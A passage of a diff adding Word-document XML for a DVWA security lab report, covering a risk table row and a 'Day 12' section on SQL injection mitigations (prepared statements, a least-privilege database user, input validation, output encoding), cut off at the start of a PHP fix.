+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Poor containment, recovery</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Medium</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Medium</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Prepare IR playbook for data breach; maintain backups and rotate secrets if compromise suspected; perform forensic capture in lab.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Medium</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>P2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>DAY-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>12</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>Mitigation verification &amp; re-tests</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>Perfect — this step is your Mitigation Verification &amp; Re-Test Phase, and you can document it as part of your Secure SDLC (Post-fix Validation) report.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>Below is your complete deliverable including:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>✅</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Proposed fixes (parameterized queries, least privilege, validation)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>✅</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Implementation steps in DVWA</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>✅</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>sqlmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> before/after test examples</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>✅</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A formatted table + narrative you can paste directly into your report</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="1"/>
+        <w:tblW w:w="10758" w:type="dxa"/>
+        <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        <w:tblCellMar>
+          <w:top w:w="15" w:type="dxa"/>
+          <w:left w:w="15" w:type="dxa"/>
+          <w:bottom w:w="15" w:type="dxa"/>
+          <w:right w:w="15" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1485"/>
+        <w:gridCol w:w="3228"/>
+        <w:gridCol w:w="6045"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="313"/>
+          <w:tblHeader/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Area</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Proposed Fix</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6000" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Example</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1528"/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Parameterized Query</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Use prepared statements to prevent injection of malicious SQL payloads.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6000" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">SELECT * FROM users WHERE id </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>= ?</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="2750"/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Least Privilege DB User</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Create a limited MySQL user (</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>app_user</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>) with only necessary permissions (SELECT, INSERT, UPDATE, DELETE).</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6000" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">GRANT SELECT, INSERT, UPDATE, DELETE ON </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>dvwa.*</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> TO '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>app_user'@'localhost</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>';</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1776"/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Input Validation</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Validate numeric parameters server-side before executing the query.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6000" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>filter_</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>input</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>INPUT_GET, 'id', FILTER_VALIDATE_INT)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1044"/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Output Encoding</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Escape HTML before displaying DB data.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6000" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>htmlspecialchars</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>($row['user'], ENT_QUOTES)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">2. Implemented Fix (PHP – </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>mysqli</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Prepared Statement)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>File: /var/www/html/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>dvwa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>/vulnerabilities/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>sqli</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>index.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>&lt;?</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
